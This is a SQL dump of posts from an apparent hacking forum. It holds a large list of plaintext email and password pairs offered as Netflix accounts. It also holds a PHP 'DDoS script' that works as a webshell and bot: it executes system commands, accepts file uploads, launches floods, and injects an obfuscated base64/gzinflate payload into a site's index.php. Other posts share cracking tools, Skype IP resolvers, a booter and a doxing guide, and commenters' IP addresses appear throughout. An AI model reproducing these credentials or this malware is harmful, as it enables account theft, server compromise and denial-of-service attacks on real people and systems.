INSERT INTO mybb_posts VALUES('4245', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1349959819', '54. cmon guys we will never reach 200 at this rate!', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'f7a9b0ea33fe761d46e349853aefea95', '0', '0'); INSERT INTO mybb_posts VALUES('4246', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '62', 'R?????zo?', '1349960559', 'he was a nice member but what betrayed us, so yeah as Ipod says we can\'t really just forget what he did and accept im back.', '46.50.38.84', '775038548', '1', '0', '62', '1349960572', '1', '329d46a2e57a8e9f65e43242f4fda91a', '0', '1349960572'); INSERT INTO mybb_posts VALUES('4247', '807', '4238', '34', 'RE: Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '0', '62', 'R?????zo?', '1349961887', 'Thanks for sharing this, I will have a look once I get home.', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'dcc68acfe5f06724c720edd38d53ae9c', '0', '0'); INSERT INTO mybb_posts VALUES('4248', '654', '4228', '9', 'RE: Make money typing captchas', '0', '53', 'sirchamp', '1349961929', '[quote=\'iTzIpod\' pid=\'4228\' dateline=\'1349955614\']\r\nBut the captcha they have are easy.\r\n[/quote]\r\n\r\nBut it takes ages to fill out 1000 captchas. This is a working method but it you need to invest lots of work and time to get any profit.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'bfeef9bb29fb6f908268f8e2c89510b8', '0', '0'); INSERT INTO mybb_posts VALUES('4249', '654', '3226', '9', 'RE: Make money typing captchas', '0', '62', 'R?????zo?', '1349962493', 'hire 100 chineses guys for every 1000 captchas they enter you pay them 0.50 = profit :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '46d8ea6a9915f5ef7805822c37f14491', '0', '0'); INSERT INTO mybb_posts VALUES('4250', '807', '4247', '34', 'RE: Ninja Graphics Kit For Free Worth $40 | All Graphics you need | Giveaway !!!', '0', '228', 'VirtualLegend', '1349966386', '[quote=\'R?????zo?\' pid=\'4247\' dateline=\'1349961887\']\r\nThanks for sharing this, I will have a look once I get home.\r\n[/quote]\r\n\r\nNo Problem, I\'m Thinking to Give often Ebooks and other stuff for free to the L33thacking Members', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8dfec9a3c0fb54b50b7f531467697298', '0', '0'); INSERT INTO mybb_posts VALUES('4251', '764', '4036', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '61', 'NXK', '1349967639', '[quote=\'Anonymous™\' pid=\'4036\' dateline=\'1349787707\']\r\nError (509)\r\nThis account\'s public links are generating too much traffic and have been temporarily disabled!\r\n[/quote]\r\n\r\nLeechers going to leech. Sadly it happens on pretty much ever hacking forum.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '72f671757198a9db1bd398897cfa2d2e', '0', '0'); INSERT INTO mybb_posts VALUES('4252', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349968435', 'Thanks Reloadzor. Like your name btw, lol.', '78.149.62.28', '1318403612', '1', '0', '0', '0', '1', 'b569cfb0855a0583c4ff9e3f989b6817', '0', '0'); INSERT INTO mybb_posts VALUES('4253', '807', '4238', '34', 'nomage<3', '0', '232', 'BreShiE', '1349969812', 'Downloading right now, I\'m mainly interested in those pricing tables, haha. Thanks a lot OP!', '78.149.62.28', '1318403612', '1', '0', '232', '1349969888', '1', 'b3384517edcff309ee24b10a97f038c0', '0', '1349969888'); INSERT INTO mybb_posts VALUES('4254', '749', '4252', '4', 'RE: It\'s BreShiE!', '0', '62', 'R?????zo?', '1349969901', '[quote=\'BreShiE\' pid=\'4252\' dateline=\'1349968435\']\r\nThanks Reloadzor. Like your name btw, lol.\r\n[/quote]\r\n\r\nmay I ask you why is that? :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '58a64939632ade742f9b4497ab971720', '0', '0'); INSERT INTO mybb_posts VALUES('4255', '749', '4254', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349970207', '[quote=\'R?????zo?\' pid=\'4254\' dateline=\'1349969901\']\r\n[quote=\'BreShiE\' pid=\'4252\' dateline=\'1349968435\']\r\nThanks Reloadzor. Like your name btw, lol.\r\n[/quote]\r\n\r\nmay I ask you why is that? :P\r\n[/quote]\r\n\r\nI\'m not actually sure, I just do for some reason. :D', '78.149.62.28', '1318403612', '1', '0', '0', '0', '1', 'c6c8900d1cdb973a3242bd257cfd9d30', '0', '0'); INSERT INTO mybb_posts VALUES('4256', '808', '0', '54', 'Huge list of NETFLIX accounts', '0', '62', 'R?????zo?', '1349970474', 'Not sure which ones work, just have to search through. Once you find one please leave the rest for everyone else to join. \r\n\r\n[code]david0524y@hotmail.com:monkey35\r\npatriciafleming9@aol.com:prissy\r\nderrickmc@aol.com:redskins\r\njoev456@comcast.net:34tipoff\r\ninfj1970@hotmail.com:largent\r\ntakahashc001@hawaii.rr.com:persol\r\njeremy.jba3737@gmail.com:dw1000\r\njeeplake@yahoo.ca:yellow\r\nhowardgordon@optonline.net:lilyan\r\njkevi@aol.com:buddah\r\nraffine:balsinno\r\nbigdrawers@hotmail.com:Mrsmith3\r\nwilly3259@yahoo.com:willy7160\r\npyroclastic_wall@yahoo.com:phoenix7\r\nj_murrietta@yahoo.com:tofa1968\r\ncflemos@gmail.com:jeba13\r\nalxdgtlgy@aol.com:21danger\r\nnova562003@hotmail.com:nova56\r\nsuepr3@yahoo.com:291617\r\nblanke84@hotmail.com:yellow55\r\nbentmci@aol.com:103144\r\nZephyr:Zephyr\r\ntaylor32:taylor32\r\nbob12:bob12\r\nAlberto:123456\r\nwunderbra:wunderbra\r\nteddy:teddy\r\ndurand:123456\r\nsahil:sahil\r\nmetoo:metoo\r\nramador:ramador\r\nratus:ratus\r\nthorsen:thorsen\r\ntommyboy:tommyboy\r\nsunshine:sunshine\r\ntetris:tetris\r\n\r\nUSER: jeffmalmquist@hotmail.com\r\nPASS: jaj32677\r\n\r\nUSER: jdonald@hawaii.rr.com\r\nPASS: hiang50\r\n\r\nUSER: jbridges11@comcast.net\r\nPASS: shadow\r\n\r\nUSER: 987654@hotmail.com\r\nPASS: 123456\r\n\r\nUSER: AMERICAN_53@yahoo.com\r\nPASS: smokey\r\n\r\nUSER: Aeronious@yahoo.com\r\nPASS: oingo\r\n\r\nUSER: Alan7524@yahoo.com\r\nPASS: thetachi\r\n\r\nUSER: Alexoah@hotmail.com\r\nPASS: maddux\r\n\r\nUSER: qmeshawn\r\nPASS: jetpilot\r\n\r\nUSER: marlboro\r\nPASS: marlboro\r\n\r\nUSER: ndbusek@gmail.com\r\nPASS: Climb1\r\n\r\nUSER: rjb612@gmail.com\r\nPASS: sockr8\r\n\r\nUSER: lekis69@yahoo.com\r\nPASS: 157408\r\n\r\nUSER: bobjoe\r\nPASS: bobjoe\r\n\r\nUser: ceejay2@hotmail.com \r\nPass: bikestud \r\n\r\nUser: christopher_cedillo@hotmail.com \r\nPass: Wharton\r\nUser : stracc13@yahoo.ca\r\nPass : biggbigg\r\n\r\nUser : fgarzalaredo@aol.com\r\nPass : bravo820\r\n\r\nUser : jpark1055@comcast.net\r\nPass : nomar103\r\n\r\n\r\nuser: jervis\r\npass: jervis\r\n\r\nuser: jeanette\r\npass: jeanette\r\n\r\nuser: jacqui\r\npass: jacqui\r\n\r\nuser: jamin\r\npass: jamin\r\n\r\nUser : jaman\r\nPass : jaman\r\n\r\nUser: Chris@Chriskphoto.com\r\nPass: melinda\r\n\r\n\r\nUser: bestj77@yahoo.com\r\nPass: jasonbest04\r\n\r\n\r\nUser: archer.girl@Verizon.net\r\nPass: dragqueen\r\n\r\n\r\nUser: chefmadrid@hotmail.com\r\nPass: eros69\r\n\r\n\r\nUser: tv2866@hotmail.com\r\nPass: pickle\r\n\r\nUser: trumoondogg@hotmail.com\r\nPass: ybnozdd\r\n\r\nUser: voodoo940@hotmail.com\r\nPass: wacked29\r\n\r\nUser: tyjaco@hotmail.com\r\nPass: oublier\r\n\r\nUser: venomslayer@hotmail.com\r\nPass: badass\r\n\r\nUser: yncdrummer@hotmail.com\r\nPass: wagie88\r\n\r\nUser: wallulis@hotmail.com\r\nPass: homey1\r\n\r\nUser: homayoun\r\nPass: homayoun\r\n\r\nUser: hirsch\r\nPass: hirsch\r\n\r\nUser: nissa\r\nPass: nissa\r\n\r\nUser: nelson\r\nPass: nelson\r\n\r\nUser: janine\r\nPass: janine\r\n\r\nUser: eddie22\r\nPass: eddie22\r\n\r\nUeer: moansjones\r\nPass: daddy71\r\n\r\nUser: ytrewq\r\nPass: qwerty\r\n\r\nUser: friendlycow@gmail.com\r\nPass: homers\r\n\r\nUser: lauretta\r\nPass: lauretta[/code]', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'dd07c9022f426d7e63343d8a8a5a6ecc', '0', '0'); INSERT INTO mybb_posts VALUES('4257', '749', '4255', '4', 'RE: It\'s BreShiE!', '0', '62', 'R?????zo?', '1349971028', '[quote=\'BreShiE\' pid=\'4255\' dateline=\'1349970207\']\r\n[quote=\'R?????zo?\' pid=\'4254\' dateline=\'1349969901\']\r\n[quote=\'BreShiE\' pid=\'4252\' dateline=\'1349968435\']\r\nThanks Reloadzor. Like your name btw, lol.\r\n[/quote]\r\n\r\nmay I ask you why is that? :P\r\n[/quote]\r\n\r\nI\'m not actually sure, I just do for some reason. :D\r\n[/quote]\r\n\r\nhaha thanks I guess :P\r\nI used to be just reload, but when I joined the blackhat world I put the \'zor\' for some reason :P', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', 'bb91e9cd3d4f4b32fde2f801828f7f84', '0', '0'); INSERT INTO mybb_posts VALUES('4258', '809', '0', '64', 'LIVE STREAM BASKETBALL / SOCCER/MMA/WWE/FOOTBALL/ESPN', '0', '62', 'R?????zo?', '1349971115', 'Here\'s something really cool I would like to share with you guys. They stream live wwe/ufc/basketball/soccer\r\n\r\nhttp://thefirstrow.eu/', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '4a64d7349caa2d373ca557ad6ad1d8d1', '0', '0'); INSERT INTO mybb_posts VALUES('4259', '810', '0', '64', 'Good website\'s for Movie\'s to Watch', '0', '62', 'R?????zo?', '1349971244', 'Hi everyone, I found a few good website\'s for you all.\r\n\r\nhttp://www.1channel.ch/\r\nhttp://noobroom.com/\r\nhttp://www.solarmovie.eu/\r\nhttp://www.openculture.com/freemoviesonline\r\nhttp://popcornflix.com/\r\nhttp://www.free-tv-video-online.me/\r\nhttp://www.free-tv-video-online.me/movies/\r\nhttp://www.indiemoviesonline.com/free-movies\r\nhttp://www.alluc.org/\r\nhttp://www.streamallyoucan.com/\r\nhttp://www.tv-links.eu/\r\nhttp://motionempire.com\r\nhttp://www.watchingitnow.com/\r\nhttp://movie25.com/\r\nhttp://johnlocker.com/\r\nhttp://videoplace.eu/\r\n\r\n\r\n\r\nCredits: kingzofmc', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '00bbef4ddda559a7e02377d15b5ad8ae', '0', '0'); INSERT INTO mybb_posts VALUES('4260', '811', '0', '17', '100+ Pictures of Same Brunette | E-Whore Pack', '0', '62', 'R?????zo?', '1349971538', 'Heres the link:\r\n\r\nhttp://www.mediafire.com/?bz79v7p7g299ex8\r\n\r\nEnjoy :)', '46.50.38.84', '775038548', '1', '0', '0', '0', '1', '64450c87e61cf733d25a86d2eaa3bcce', '0', '0'); INSERT INTO mybb_posts VALUES('4261', '812', '0', '61', 'Skype resolvers [WEB BASED]', '0', '62', 'R?????zo?', '1349971694', 'Here are a bunch of sites where you can use Skype IP Resolvers. \n\n[lock]\n\nhttp://www.asylumbooter.us/booter/register.php\n(register then just login and use skype ip resolver)\n\nhttp://godlyresolver.netne.net/\n\nhttp://www.engagetutorials.co.cc/skype.php\n\nhttp://67.23.226.149/~silentcr/\n\nhttp://www.anonware.net/resolver.php\n\nhttp://atomicapi.net/skype.php?name=\n(That\'s an API :P)\n\nhttp://zaldronsdeadlys.comlu.com/\n\n\nhttp://team-enigma.net/resolve.php\n\n\nhttp://skypegrab.vacau.com\n\n[/lock]', '46.50.38.84', '775038548', '1', '0', '62', '1352550936', '1', '303416be3df55943af88df836925d70b', '0', '1352550936'); INSERT INTO mybb_posts VALUES('4262', '813', '0', '61', 'Ultimate Steam Cracking Pack', '0', '62', 'R?????zo?', '1349972205', 'Pack Comes With:\n- Bruteforcer\n- Steam Username Leecher + Wordlist\n- 4 Password Lists (From 50 Passwords To 4,000,000 Passwords)\n- Proxies (You Should Take New One Because Most Of These Are Outdated)\n\nDownload link: http://www.mediafire.com/?28djl9yz692cyod\n\nNOTE: run on a sandboxie, I\'ve not scanned if this is clean or not.\nUse at your own risk, but should be clean.', '46.50.38.84', '775038548', '1', '0', '62', '1349972243', '1', '85135f1751b469145684f8b0b732bbba', '0', '1349972243'); INSERT INTO mybb_posts VALUES('4263', '814', '0', '14', 'How to Get a Free VPN (Lifetime)', '0', '62', 'R?????zo?', '1349972400', '1. Go to http://vpntracker.com/us/index.html\r\n2. Register 30 days trial with your email.\r\n3. This VPN lasts for 30-40 days\r\n4. Then you can see resend activation mail under profile and click on that and you will get another 30 days trial by confirming that mail....\r\n5. Repeat 4th step continuously once a month and you will get lifetime VPN', '46.50.38.84', '775038548', '1', '0', '62', '1349973531', '1', 'fa8a4caaea3ac54270a318c309f2b8b6', '0', '1349973531'); INSERT INTO mybb_posts VALUES('4264', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349973371', 'Yeah, you find that a lot haha. Reloadzor teH Hax0r.', '78.149.62.28', '1318403612', '1', '0', '0', '0', '1', 'b78ed51cc742249e2b1f857f9d4598c1', '0', '0'); INSERT INTO mybb_posts VALUES('4265', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '100', '??zg???g????61', '1349975765', 'Welcome buddy :) have a nice stay.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'a0367e2acc21514da4d49804ba518d91', '0', '0'); INSERT INTO mybb_posts VALUES('4266', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '252', 'k3h3d5', '1349983084', 'Nice Tutorial Thanks Information ...', '110.137.72.228', '1854490852', '0', '0', '0', '0', '1', '1ae4969b15d8b2e1fe320d98fd0f5beb', '0', '0'); INSERT INTO mybb_posts VALUES('4267', '815', '0', '73', 'your favourite iOS games', '0', '62', 'R?????zo?', '1349983096', 'what are you favourite games ?', '94.132.244.168', '1585771688', '1', '0', '62', '1349983123', '1', '57d8e529207c5af53d0286106066a98b', '0', '1349983123'); INSERT INTO mybb_posts VALUES('4268', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1349984045', 'Still though. It\'s looking nice. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b0c0177c2b4797dc55354318c0647596', '0', '0'); INSERT INTO mybb_posts VALUES('4269', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1349984079', 'Might come back to the forum. Maybe.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '705aefdfc523415871a11ad76fed7101', '0', '0'); INSERT INTO mybb_posts VALUES('4270', '782', '4052', '7', 'RE: We need to advertise!', '0', '82', 'iTzIpod', '1349984135', 'We\'re still banned? Really? -.-\n\n\nNo wonder he\'s so pissed off at me then.', '24.212.197.164', '416597412', '1', '0', '1', '1350003261', '1', 'af8d3d1b3feb8f857bfb904e8b3f60b1', '0', '1350003261'); INSERT INTO mybb_posts VALUES('4271', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349984174', 'http://l33thacking.net/thread-190-page-8.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5cd1cae828f15e0f49157a49799a2583', '0', '0'); INSERT INTO mybb_posts VALUES('4272', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349984207', '55.\n \n/me is le shit .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0403875ae0060a0024c9c59c47fe98fe', '0', '0'); INSERT INTO mybb_posts VALUES('4273', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '82', 'iTzIpod', '1349984305', 'I know. That\'s what I said. We can\'t go back for him.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6753c8b5557a910a87aee75422e127b', '0', '0'); INSERT INTO mybb_posts VALUES('4274', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349984337', 'No. That\'s just racist...\n\n -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '34d06a8c63a72845f119c19cd7bbdd91', '0', '0'); INSERT INTO mybb_posts VALUES('4275', '418', '4269', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '62', 'R?????zo?', '1349985836', '[quote=\'iTzIpod\' pid=\'4269\' dateline=\'1349984079\']\r\nMight come back to the forum. Maybe.\r\n[/quote]\r\n\r\nyou need to!\r\nI already miss you :(', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11f5e9ba8177a13e204f790e8228e0a5', '0', '0'); INSERT INTO mybb_posts VALUES('4276', '816', '0', '9', '| Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '17', '228', 'VirtualLegend', '1349990491', '[align=center][size=medium][color=#32CD32]Hello l33thacking Members,\r\nhere is a small list of traffic exchange sites. All links without refferal.[/color]\r\n\r\n[color=#FFD700][size=medium]My favorite is Hitleap !!![/size][/color]\r\n\r\n[color=#98FB98]EasyHit4U\r\nEmpireviews\r\nHitLeap\r\nRoboViews\r\nYouLikeHits\r\nEnhanceViews\r\n247TrafficPro\r\nWebSyndic\r\nVagex\r\nu2bviews\r\nShareYoutubeVideos\r\nAddMeFast\r\nStartXchange\r\nTrafficG\r\nTrafficSplash\r\n10kHits\r\nMarketingSurf\r\neBesucher\r\nOxosurf\r\nSmileyTraffic\r\nSocialMediaExplode\r\nuWantFans[/color]\r\n\r\n[color=#FFD700][size=medium]Google Them :P [/size][/color]\r\n\r\n[color=#32CD32]If you know more sites post it below and I will add them .[/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '228', '1349990568', '1', '205e25576aff47b48d5a2511da4c0d55', '0', '1349990568'); INSERT INTO mybb_posts VALUES('4285', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '1', 't3h jok3r', '1350003389', 'True and a person like him who has been banned on almost every forum he is on because of his attitude and false accusations so he was going to be banned someday on LH due to his attitude. If he was nice to members then I would\'ve still let him stay here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a168a902c6f4f136643b3248185daa51', '0', '0'); INSERT INTO mybb_posts VALUES('4286', '817', '4281', '7', 'RE: Favorite Quote?', '0', '1', 't3h jok3r', '1350003795', 'It\'s better to be hated than loved.\n\nNot my most favorite but one of quotes I like.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'da00ae89d366c591a47cb30781a39178', '0', '0'); INSERT INTO mybb_posts VALUES('4287', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '1', 't3h jok3r', '1350003897', 'I updated the forum icon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'febe4ad5bd22bad242ba83d5db7e2f43', '0', '0'); INSERT INTO mybb_posts VALUES('4288', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1350003907', 'http://l33thacking.net/thread-811.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '59254d9837f63ffead921da9b221da97', '0', '0'); INSERT INTO mybb_posts VALUES('4289', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1350003929', '56. http://l33thacking.net/thread-811.html \n\n811 thread, so awesome.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fa9860ea4421005e514f002d42719123', '0', '0'); INSERT INTO mybb_posts VALUES('4290', '772', '3947', '58', 'RE: Group Request', '0', '7', 'Romdu62', '1350004591', 'Why didn\'t any staff member comment here?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '248d7ac2cfb6231d94d210573061622e', '0', '0'); INSERT INTO mybb_posts VALUES('4291', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '7', 'Romdu62', '1350004672', 'When is the fearless group recruiting?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '61baadebc2f69f8c618823625f189222', '0', '0'); INSERT INTO mybb_posts VALUES('4292', '819', '0', '68', 'PHP DDoS Script', '0', '7', 'Romdu62', '1350005038', '[code]\r\n<?php error_reporting(0);\r\n$base = dirname(__FILE__).\"/\";\r\nfunction stoped() {cmdexec(\"killall -9 perl;\r\nkillall -9 perl-bin;\r\nkillall -9 perl-cgi;\r\n\");\r\nunlink($base.\"start.php\");\r\nunlink($base.\"f1.pl\");\r\nunlink($base.\"run.pl\");\r\nunlink($base.\"startphp.php\");\r\nprint \"<stopcleandos>Stop & Clean</stopcleandos>\";\r\napache_child_terminate();\r\n}function UploadFile($File){cmdexec(\"killall -9 perl\");\r\ncmdexec(\"killall -9 perl-bin\");\r\ncmdexec(\"killall -9 perl-cgi\");\r\n$target_path =\"./\";\r\n$target_path = $target_path . basename( $File[\'name\']);\r\n@move_uploaded_file($File[\'tmp_name\'], $target_path);\r\n}function cmdexec($cmd){if(function_exists(\'system\'))@system($cmd);\r\nelseif(function_exists(\'passthru\'))@passthru($cmd);\r\nelseif(function_exists(\'shell_exec\'))@shell_exec($cmd);\r\nelseif(function_exists(\'exec\'))@exec($cmd);\r\nelseif(function_exists(\'popen\'))@popen($cmd,\"r\");\r\n}function curPageURL(){$pageURL = \'http\';\r\nif ($_SERVER[\"HTTPS\"] == \"on\") {$pageURL .= \"s\";\r\n}$pageURL .= \"://\";\r\nif ($_SERVER[\"SERVER_PORT\"] != \"80\") {$pageURL .= $_SERVER[\"SERVER_NAME\"].\":\".$_SERVER[\"SERVER_PORT\"].$_SERVER[\"REQUEST_URI\"];\r\n} else {$pageURL .= $_SERVER[\"SERVER_NAME\"].$_SERVER[\"REQUEST_URI\"];\r\n}return $pageURL;\r\n}function DNullRequest() {@ob_start();\r\nprint \"<!DOCTYPE HTML PUBLIC\\\"-//IETF//DTDHTML 2.0//EN\\\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>\";\r\ndie();\r\n}if ($_GET[\'action\']==\"status\") {print \"itsoknoproblembro\";\r\nexit();\r\n}if ($_GET[\'action\']==\"start.php\") {cmdexec(\"ps | grep -r perl\");\r\nexit();\r\n}if ($_GET[\'action\']==\"startphp.php\") {cmdexec(\"ps | grep -r php\");\r\nexit();\r\n}if ($_GET[\'action\']==\"infection\") {$up = \"<?php eval(gzinflate(base64_decode(\'jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+V?c2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM?9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1?aTi2mGSmT8L/Lj7mfJwd/8B\')));\r\n?>\";\r\n$index =$_SERVER[\'DOCUMENT_ROOT\'].\"/index.php\";\r\nif (file_exists($index)) {$fp = @fopen($index, \'a+\');\r\n@fwrite($fp, $up);\r\n@fclose($fp);\r\n$content = file_get_contents($index);\r\nif (eregi(\"RSqMi6uu\",$content)) {print \"<infectdos>Infected</infectdos>\";\r\n}else{print \"<infectdos>Not Infected</infectdos>\";\r\n}}else{print \"<infectdos>N E I</infectdos>\";}}switch($_POST[\'action\']){case \"upload\":UploadFile($_FILES[\'file\']);\r\nbreak;\r\ncase \"stop\":stoped();\r\nbreak;\r\ncase \"ust\":$page = curPageURL();\r\n$ip = $_POST[\'ip\'];\r\n$port = \"11\";\r\n$out = $page.\"\\n\";\r\n$socket = stream_socket_client(\"udp://$ip:$port\");\r\nif ($socket) {stream_set_write_buffer($socket, 0);\r\nstream_socket_sendto($socket,$out);\r\n}fclose($socket);\r\nbreak;\r\ncase \"ab\":$url = $_POST[\'url\'];\r\n$c = $_POST[\'c\'];\r\n$n = $_POST[\'n\'];\r\ncmdexec(\"ab -c $c -n $n $url\");\r\nbreak;\r\ndefault:DNullRequest();\r\nbreak;\r\n}?>\r\n[/code]\r\n\r\nNot sure if it still works because I had this saved in my notepad.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8f0e2568f16afb8c3639e9733732b6a5', '0', '0'); INSERT INTO mybb_posts VALUES('4278', '782', '4052', '7', 'RE: We need to advertise!', '0', '222', 'Exposé', '1349991272', 'Well as I said above we need to just make threads on other forums...', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', 'fc65229430fefc4c64c7126953524e1c', '0', '0'); INSERT INTO mybb_posts VALUES('4279', '717', '3644', '12', 'RE: How to Bruteforce VPS! [ADMIN READ PLEAE]', '0', '2', 'Apathy', '1349991453', 'Thanks for the share mate. :$ I may try this.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '30e030d23938b62c3f9c83ab79f866fd', '0', '0'); INSERT INTO mybb_posts VALUES('4280', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1349992297', 'I\'ll be on Skype every now and then.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'edb8006ee1b0f5d55162e816d18f6dbb', '0', '0'); INSERT INTO mybb_posts VALUES('4281', '817', '0', '7', 'Favorite Quote?', '0', '82', 'iTzIpod', '1349992473', 'What\'s your favorite quote?\r\nMine is\r\nTrust is like an eraser; It gets smaller and smaller after every mistake.\r\n\r\nI heard this on Twitter a couple days ago. \r\n:p\r\nWill update or post a new quote everyday or so maybe.\r\nI don\'t know.\r\nI\'ll try.\r\nWhat\'s your favorite quote? Post below.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ac16cb18a66d2159601f1f9b9f0d4f0a', '0', '0'); INSERT INTO mybb_posts VALUES('4282', '817', '4281', '7', 'RE: Favorite Quote?', '0', '62', 'R?????zo?', '1349992778', '\"some people walk in the rain, others just get wet\"\n\nNo idea, just catch my eye.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '98c6438b9c7325dfb42c6f7bfc0cbc03', '0', '0'); INSERT INTO mybb_posts VALUES('4283', '818', '0', '61', 'Leak Ultimate In-Depth Doxing Tutorial', '0', '62', 'R?????zo?', '1349993473', 'Have fun guys.\n\n\nDownload link: http://wormszone.net/downloads/Ultimate%20In-Depth%20Doxing%20Tutorial.pdf', '94.132.244.168', '1585771688', '1', '0', '62', '1349993481', '1', 'a142eec58b1caf43efd6108e544ca30c', '0', '1349993481'); INSERT INTO mybb_posts VALUES('4293', '820', '0', '18', '[FREE]Youtube Bot - View increaser + 4,000 proxy list', '0', '7', 'Romdu62', '1350005599', 'Before download links here are virus scans \nVirus total [color=#FF0000]12/42[/color]\n[spoiler]https://www.virustotal.com/file/483fa11c3ef5ef8ffe181827c9b8b1d99e45d3563920363b4e2c773adecb743f/analysis/1346618438/ [/spoiler]\n\n\njotti [color=#FF0000]4/20[/color]\n[spoiler] http://virusscan.jotti.org/en/scanresult/0eefd2f8c8bb10c573488878b2d2623bb782a1f3/daeab53fca2ea92001894f3f3522da9ac7b47182 [/spoiler]\n\n\nIt looks suspicious and i am new around here .. My [color=#FFD700]advice[/color] would be to run it in sand box or virtual machine unless you know what are these reports or know how to analyze changes(and other stuffs) on your pc ... \n\nThis is the original screen shot i ve made long time ago and some of you probably saw it on other forum(won\'t mention which one) .. \n\n[align=center][img]http://t3.gstatic.com/images?q=tbn:ANd9GcRJ0B9QQHz4NIhgqhEakSC5qHbWNHVzeOCEfext_UrV1QMNXfRBfw&t=1[/img][/align]\n[align=center]\nHere are download links :\n\n[url=http://adf.ly/T4F4][color=#FFD700]Youtube Bot[/color][/url]\n\n[url=http://adf.ly/CVCew][color=#FF0000]Proxy List 4,000+(Sep 02 2012)[/color] [/url][/align]\n\n[align=center][size=x-large][color=#32CD32]Keep reading:[/color][/size]\n[/align]\n\nAt ~250 views youtube usually lock/freeze view count. However that is bypassed after 4-6 hours of constant visits(bot running,i run 3-4 instances of the bot at once usually).\n\nIt is interesting that many claimed it is not working,however i have increased views of one of my videos (have 2 videos on channel) to 1600+, just as test,and in few days the rate jumped to 2,9k+ and i got 3 new subs on channel. If you are interested for live preview of the video PM me. Here is SS of the video :\n\n[align=center][img]http://www.dodaj.rs/f/2s/Ni/25guNCAx/untitled.png[/img][/align]', '72.231.24.165', '1223104677', '0', '0', '7', '1350005666', '1', 'e0f98fa031fb408e23b1f3448befc0ad', '0', '1350005666'); INSERT INTO mybb_posts VALUES('4294', '821', '0', '28', 'What\'s on your mind or what are your future plans?', '0', '5', 'Timmy', '1350006694', 'What\'s going on in your mind or what have you been thinking of recently but not sure if 